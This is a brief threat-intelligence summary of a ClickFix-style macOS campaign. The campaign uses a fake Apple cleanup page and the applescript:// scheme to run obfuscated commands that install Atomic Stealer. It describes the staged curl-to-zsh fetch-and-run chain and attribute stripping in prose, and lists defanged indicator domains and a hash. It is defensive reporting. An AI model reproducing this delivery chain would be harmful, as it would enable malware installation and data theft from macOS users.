A newly observed ClickFix-style macOS attack replaces Terminal-based execution with macOS Script Editor and a browser-triggered applescript:// workflow to evade Terminal-focused defenses. The campaign uses an obfuscated staged delivery that downloads and runs a Mach-O binary, ultimately installing a variant of Atomic Stealer. #ClickFix #AtomicStealer
Keypoints
- Attackers moved from Terminal paste attacks to using macOS Script Editor invoked via an Apple-themed webpage and the applescript:// URL scheme.
- The webpage presents a pre-filled script that appears to be a cleanup tool but contains an obfuscated shell command.
- The initial script decodes a hidden URL using tr, fetches content with curl -k, and pipes it to zsh for in-memory execution.
- A second-stage script downloads a Mach-O binary to /tmp, removes extended attributes, sets execution permissions, and runs a variant of Atomic Stealer.
- Indicators include domains dryvecar[.]com, storage-fixes.squarespace[.]com, cleanupmac.mssg[.]me and the helper SHA256 3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44.
Read More: https://thecyberexpress.com/clickfix-style-macos-attack/